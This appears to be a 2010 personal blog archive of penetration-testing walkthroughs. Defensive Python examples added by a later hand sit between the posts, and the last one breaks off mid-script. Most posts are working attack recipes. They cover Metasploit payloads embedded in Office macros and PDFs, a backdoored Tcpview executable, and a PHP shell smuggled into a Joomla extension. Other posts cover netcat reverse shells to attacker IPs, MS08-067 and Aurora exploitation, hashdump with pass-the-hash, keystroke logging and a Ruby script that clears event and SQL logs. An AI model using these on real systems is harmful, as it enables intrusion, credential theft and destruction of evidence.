Dear All,
As of today, my personal blog has moved to http://flexi-learn.blogspot.com
New posts will be published there as soon as possible.
Monday, July 26, 2010
Thursday, June 24, 2010
Covert Analysis II (Forensics)
On LON-WEB1, open the Event Viewer MMC snap-in, select the System log, choose Save Log File As, and save the System log under another name:
Example: C:\Backup\SysEvent-Backup.evt
From LON-WEB1, send the SysEvent-Backup.evt file to the CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
On the CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the saved file to view the events.
Overt Analysis (Forensics)
Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launched, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Covert Analysis I (Forensics)
On CHFI-XP2, launch Netcat in Listening Mode:
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to run Netcat from a different directory, call it by its full path:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysinternalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysinternalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file in which the collected evidence is stored.
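The Netcat transfers in this post and in Covert Analysis II above carry no integrity check of their own, so the receiving examiner should hash each file on arrival and keep a manifest that can be re-verified later. The Python script below is an added example and not part of the original post; the file names (MyEvidence.txt, manifest.jsonl), the collector name and the sample file content are constructed.

```python
"""Added example (not from the original post): hash evidence files on receipt
and keep a verifiable manifest, since the Netcat transfer itself provides no
integrity protection. File names and sample content are constructed."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 16):
    """Hash a file in chunks so a large event log need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def record_evidence(path, collector, source_host, manifest_path):
    """Append a chain-of-custody entry for one file to a JSON-lines manifest."""
    entry = {
        "file": os.path.abspath(path),
        "size": os.path.getsize(path),
        "sha256": sha256_file(path),
        "collected_by": collector,
        "source_host": source_host,
        "recorded_at": datetime.now(timezone.utc).isoformat(),
    }
    with open(manifest_path, "a", encoding="utf-8") as mf:
        mf.write(json.dumps(entry) + "\n")
    return entry


def verify_manifest(manifest_path):
    """Re-hash every listed file; return {path: True if unchanged, else False}."""
    results = {}
    with open(manifest_path, encoding="utf-8") as mf:
        for line in mf:
            entry = json.loads(line)
            path = entry["file"]
            results[path] = os.path.exists(path) and sha256_file(path) == entry["sha256"]
    return results


def demo():
    """Constructed run: record a file, verify it, tamper with it, verify again."""
    workdir = tempfile.mkdtemp(prefix="evidence-")
    evidence = os.path.join(workdir, "MyEvidence.txt")
    manifest = os.path.join(workdir, "manifest.jsonl")
    with open(evidence, "w", encoding="utf-8") as fh:
        fh.write("Windows IP Configuration\n")  # constructed stand-in for ipconfig output
    entry = record_evidence(evidence, "examiner", "LON-WEB1", manifest)
    intact = verify_manifest(manifest)[entry["file"]]
    with open(evidence, "a", encoding="utf-8") as fh:
        fh.write("line appended after collection\n")
    tampered = verify_manifest(manifest)[entry["file"]]
    return entry["sha256"], intact, tampered


if __name__ == "__main__":
    print(demo())  # (hash, True, False)
```

In practice the manifest is written on the examiner's machine the moment the listener closes the file, and verified again before any analysis result is reported; the script flags any file that has changed or gone missing since collection.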
Tuesday, May 18, 2010
Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to a VBA (Visual Basic for Applications) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and Paste the contents of the payload to your evil file
Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 5: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Friday, May 14, 2010
ECSA/LPT @ ECDC Photos
Guys, download our photos from here:
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
Thursday, May 13, 2010
Autopwn = Ninja Script!
msf > db_driver sqlite3
msf > db_create pentest
msf > db_nmap -sS -p135,139,445 192.168.1.200
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e -r
SMB Pass the Hash
Step 1:
Get the hashes from the target machine (e.g. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit
meterpreter > run hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Step 2:
Copy the hash, then pass it using psexec
msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
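A defender reviewing a hashdump-format export wants to turn its lines into configuration findings. The Python audit below is an added example and not from the original post: it parses the two hashdump lines shown above plus one constructed `svc_backup` line, and flags stored LM hashes (the NoLMHash policy is not enforced), empty passwords, and NT hashes shared between accounts (password reuse). The two empty-string hash constants are public, well-known values, not secrets.

```python
"""Added example (not from the original post): audit a hashdump-style export
for password-storage weaknesses. Sample line 3 is constructed."""
import re
from collections import defaultdict

# Well-known hashes of the empty string (public constants, not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# The first two lines are the hashdump output shown in the post; the third is a
# constructed service account that reuses the Administrator NT hash.
SAMPLE = """\
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines into dicts; reject anything malformed."""
    records = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        match = LINE_RE.match(raw)
        if not match:
            raise ValueError(f"unrecognised hashdump line: {raw!r}")
        rec = match.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        records.append(rec)
    return records


def audit(records):
    """Per-account findings a defender should act on."""
    findings = []
    for rec in records:
        issues = []
        if rec["lm"] != EMPTY_LM:
            issues.append("LM hash stored (NoLMHash policy not enforced)")
        if rec["nt"] == EMPTY_NT:
            issues.append("empty password")
        findings.append({"user": rec["user"], "rid": rec["rid"], "issues": issues})
    return findings


def find_reuse(records):
    """Map each NT hash used by more than one account to the sorted user list."""
    by_nt = defaultdict(list)
    for rec in records:
        by_nt[rec["nt"]].append(rec["user"])
    return {nt: sorted(users) for nt, users in by_nt.items() if len(users) > 1}


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE)
    for finding in audit(recs):
        print(finding)
    print(find_reuse(recs))
```

An "empty password" hit on a disabled Guest account is expected; the audit reports it so the reviewer can confirm the account really is disabled rather than assume it.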
Client-side Attack by Using Evil PDF
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Create an evil pdf
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit
Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory
Result: /tmp/BestComputerGuide.pdf
Step 3: Send the evil pdf file to your client
Step 4: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Wednesday, May 12, 2010
Fabrikam Website Pen-Test
Step 1:
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus
Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form
Step 2:
Go to http://www.fabrikam.com/administrator/ and log in with the username and password you obtained in Step 1.
Download a Joomla extension (e.g. GalleryXML = Photo Gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (e.g. the Z:\Tools\PHP Shell folder).
Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.
Step 4:
Edit the galleryxml.xml control file and put dshell.php (PHP Shell) in the admin section.
Step 5:
Copy dshell.php to com_galleryxml/admin folder.
Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.
Step 7:
Use the "Extension Manager -> Upload & Install", browse and upload com_galleryxml.zip file.
Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php
Step 9:
Using the upload function of dshell.php, upload nc.exe to the remote server.
Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443
From dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe
If the connection was successful, you should get a command prompt on your machine.
References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html
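From the site owner's side, steps 4 to 7 describe an installable extension package carrying a PHP shell, which is exactly what a pre-installation check of uploaded packages should catch. The Python scanner below is an added example, not the post's tooling and not Joomla's: it builds a constructed com_galleryxml-style archive in memory, compares the archive contents with the file list declared in the XML manifest, and flags PHP files that call command-execution functions. The manifest layout is a simplified stand-in for a Joomla 1.5 component manifest, and the sample PHP contents are non-functional placeholders.

```python
"""Added example (not from the original post): inspect an extension archive
before installing it. Archive, manifest and PHP contents are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# PHP functions that hand a string to the operating system shell.
DANGEROUS = re.compile(r"\b(shell_exec|exec|system|passthru|proc_open|popen)\s*\(", re.I)

# Simplified stand-in for a Joomla 1.5 component manifest (assumed layout).
SAMPLE_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<install type="component" version="1.5.0">
  <name>GalleryXML</name>
  <files folder="site">
    <filename>galleryxml.php</filename>
  </files>
  <administration>
    <files folder="admin">
      <filename>admin.galleryxml.php</filename>
      <filename>dshell.php</filename>
    </files>
  </administration>
</install>
"""


def build_sample_zip():
    """Constructed archive: manifest, two legitimate files, one shell-like file
    that the manifest declares, and one file the manifest does not mention."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("galleryxml.xml", SAMPLE_MANIFEST)
        zf.writestr("site/galleryxml.php", "<?php echo 'gallery'; ?>")
        zf.writestr("admin/admin.galleryxml.php", "<?php echo 'admin'; ?>")
        # Placeholder only: the call pattern a scanner should flag, not a working shell.
        zf.writestr("admin/dshell.php", "<?php\n$r = passthru($input);\n")
        zf.writestr("admin/helper.php", "<?php echo 'undeclared'; ?>")
    return buf.getvalue()


def declared_files(manifest_xml):
    """Return the set of archive paths the manifest claims to ship."""
    root = ET.fromstring(manifest_xml)
    paths = set()
    for files in root.iter("files"):
        folder = files.get("folder", "")
        for child in files:
            if child.tag in ("filename", "file", "folder") and child.text:
                name = child.text.strip()
                paths.add(f"{folder}/{name}" if folder else name)
    return paths


def scan_archive(zip_bytes, manifest_name):
    """Report files missing from the manifest and PHP files with shell calls."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [n for n in zf.namelist() if not n.endswith("/")]
        declared = declared_files(zf.read(manifest_name))
        undeclared = sorted(n for n in names if n != manifest_name and n not in declared)
        dangerous = {}
        for name in names:
            if name.lower().endswith(".php"):
                src = zf.read(name).decode("utf-8", errors="replace")
                hits = sorted({m.group(1).lower() for m in DANGEROUS.finditer(src)})
                if hits:
                    dangerous[name] = hits
    return {"undeclared": undeclared, "dangerous_calls": dangerous}


if __name__ == "__main__":
    print(scan_archive(build_sample_zip(), "galleryxml.xml"))
```

The manifest comparison alone is not enough, because step 4 of the post edits the manifest to declare the shell; the content scan is what catches a declared file. Both checks belong in the review of any package uploaded through Extension Manager.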
Tuesday, May 11, 2010
My Sample Report for VA & PT
Here is my sample report which can be used for Vulnerability Analysis and Pen-Test.
Download Sample Report (VA-PT)
Monday, May 10, 2010
Download External Meterpreter Scripts and Tool
ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x
cd /pentest/exploits/framework3/scripts/meterpreter
wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe
Testing IDS with Encoded Payload
Step 1: On TEST-BT4, create an Encoded EXE Payload
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: On DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
Testing IDS with Sample Attacks
Port Scanning
Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254
Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak
IIS Unicode Directory Traversal Exploit Test
Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter twice (the empty line ends the request)
Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified
Apache Directory Access Test
Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter twice (the empty line ends the request)
Snort: WEB-MISC .htaccess access
Category: attempted-recon
Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter twice (the empty line ends the request)
Snort: WEB-MISC robots.txt access
Category: web-application-activity
Ping Flood (Simple DoS Attack)
Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)
Snort: ICMP L3retriever Ping
Category: attempted-recon
IDS Evasion Attack
Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Installing Nessus on BackTrack and Ubuntu Desktop
Step 1: Download from http://www.nessus.org and Install Nessus
Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory
Installing Nessus with Debian Package Manager
cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb
Step 2: Add Nessus User
cd /opt/nessus/sbin
./nessus-adduser
Step 3: Register Nessus and Download All Plugins
Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.
cd /opt/nessus/bin
./nessus-fetch --register serial_number
Example:
./nessus-fetch --register 2B92-597B-2D44-C737-2309
Step 4: Launch Nessus Server and Apply All Plugins
cd /opt/nessus/sbin
./nessus-service
or
/etc/init.d/nessusd start
Step 5: Launch Nessus Client
https://localhost:8834/
Step 6: Update Plugins
cd /opt/nessus/sbin
./nessus-update-plugins
Nessus plugins are located at: /opt/nessus/lib/nessus/plugins
Friday, April 9, 2010
SQL Log Clear
Example of an MSSQL Log Clear (mssqlclear.rb)
#MSSQL Log Clear
def list_exec(session, cmdlst)
  print_status("Running Command List ...")
  r = ''
  session.response_timeout = 120
  cmdlst.each do |cmd|
    begin
      print_status("running command #{cmd}")
      r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
      while (d = r.channel.read)
        print_status("#{d}")
      end
      r.channel.close
      r.close
    rescue ::Exception => e
      print_error("Error Running Command #{cmd}: #{e.class} #{e}")
    end
  end
end

# Stop the SQLEXPRESS instance, delete its error log and trace files, then start it again
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
  'Net START "SQL Server (SQLEXPRESS)"']

def clrevtlgs(session)
  evtlogs = [
    'security',
    'system',
    'application',
    'directory service',
    'dns server',
    'file replication service'
  ]
  print_status("Clearing Event Logs, this will leave an event 517")
  begin
    evtlogs.each do |evl|
      print_status("Clearing the #{evl} Event Log")
      log = session.sys.eventlog.open(evl)
      log.clear
    end
    print_status("All Event Logs have been cleared")
  rescue ::Exception => e
    print_status("Error clearing Event Log: #{e.class} #{e}")
  end
end

list_exec(client, commands)
clrevtlgs(client)
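The script stops the SQL Server service, deletes its logs, restarts it and then clears the event logs; as its own status message notes, clearing the Security log leaves event 517 behind. Those are the traces a defender should alert on. The Python detector below is an added example and not from the original post: it runs over a constructed CSV export of event log entries and flags the "audit log cleared" events (517 on Windows 2000/XP/2003, 1102 on Vista and later) and a SQL Server service that stopped and restarted within a short window, as recorded by Service Control Manager event 7036. The CSV column layout is an assumption of the example.

```python
"""Added example (not from the original post): detect the traces an
event-log-clearing script leaves. The CSV export below is constructed."""
import csv
import io
from datetime import datetime

# Constructed sample export of System and Security log entries (not real data).
SAMPLE_EVENTS = """\
time,log,source,event_id,user,message
2010-04-09 10:01:12,System,Service Control Manager,7036,N/A,The SQL Server (SQLEXPRESS) service entered the stopped state.
2010-04-09 10:01:15,System,Service Control Manager,7036,N/A,The SQL Server (SQLEXPRESS) service entered the running state.
2010-04-09 10:01:40,Security,Security,517,SYSTEM,The audit log was cleared.
2010-04-09 10:02:03,System,Service Control Manager,7036,N/A,The Print Spooler service entered the running state.
"""

# 517: Security log cleared on Windows 2000/XP/2003; 1102: the same on Vista and later.
LOG_CLEARED_IDS = {517, 1102}


def parse_events(text):
    """Read the CSV export into dicts with typed time and event_id fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["event_id"] = int(row["event_id"])
        row["time"] = datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def detect_log_clearing(events, service_keyword="SQL Server", max_gap_seconds=300):
    """Return (kind, time, detail) alerts for cleared audit logs and for a
    quick stop/start of the named service, which is what log deletion needs."""
    alerts = []
    pending_stop = None
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["log"] == "Security" and ev["event_id"] in LOG_CLEARED_IDS:
            alerts.append(("audit_log_cleared", ev["time"], ev["message"]))
        if ev["event_id"] == 7036 and service_keyword in ev["message"]:
            if "stopped state" in ev["message"]:
                pending_stop = ev["time"]
            elif "running state" in ev["message"] and pending_stop is not None:
                gap = (ev["time"] - pending_stop).total_seconds()
                if gap <= max_gap_seconds:
                    alerts.append(("service_bounced", ev["time"],
                                   f"{service_keyword} stopped and restarted within {int(gap)}s"))
                pending_stop = None
    return alerts


if __name__ == "__main__":
    for alert in detect_log_clearing(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Because the script clears the System log last, the 7036 pair may itself be gone from the host; the detection only works if the events were already forwarded to a collector before the clear, which is the practical mitigation this script argues for.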
Tuesday, April 6, 2010
Tuesday, March 9, 2010
IE Aurora (CVE-2010-0249) with Metasploit 3.x
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Tutorial: Keystroke Logger with Meterpreter
Target: 131.107.1.50 (Windows XP SP2 English)
Yours: 131.107.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use DNS poisoning or cache poisoning to map a domain name to the IP address.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate to another process (Explorer.exe or Winlogon.exe)
Note:
- Migrate to Explorer.exe if you want to capture desktop keystrokes.
- Migrate to Winlogon.exe if you want to capture Windows logon keystrokes.
List all processes...
meterpreter > ps
Migrate to Explorer.exe or Winlogon.exe (use its PID number)...
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
Tutorial: NTLM Hijacking with SMB Relay Exploit
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Prepare the SMB Exploit
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 5555
msf > exploit
Step 2: Connect to the FAKE shared folder from the remote machine
\\192.168.1.252\shared\xxx.jpg
shared\xxx.jpg is a fake link
Step 3: Interact with the open session
Check the active sessions...
msf > sessions -l
Interact with active session# 1
msf > sessions -i 1
Command shell...
meterpreter > shell
Tutorial: Exploiting Windows XP SP2 with MS08-067 Vulnerability
Target: 192.168.1.50 (Windows XP SP2 English)
Yours: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (depends on step# 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that the TFTPD service is started (Start > Services > TFTPD > Start TFTPD) and copy nc.exe from the /pentest/windows_binaries/tools directory to the /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode on the target on port 5555 (Netcat spawns a command shell for whoever connects)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our privilege level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
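The Snort alerts listed in the IDS-testing post above and the traversal requests in this tutorial can also be found after the fact in the web server's access log, which is where a defender confirms whether the request got a 200. The Python analyser below is an added example and not part of either post: it parses constructed combined-format log lines carrying the request strings shown above, decodes percent-encoding repeatedly to spot double encoding (what Snort reports as DOUBLE DECODING ATTACK), and tags traversal, cmd.exe, .htaccess and robots.txt requests. The log lines, client address and status codes are constructed.

```python
"""Added example (not from the original post): flag traversal, double-encoding
and sensitive-file requests in web access logs. Log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed combined-format lines; the request paths are the ones used in the
# IDS-testing and IIS traversal posts.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Mar/2010:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.5 - - [08/Mar/2010:10:00:02 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1024
10.0.0.5 - - [08/Mar/2010:10:00:03 +0000] "GET /.htaccess HTTP/1.0" 403 0
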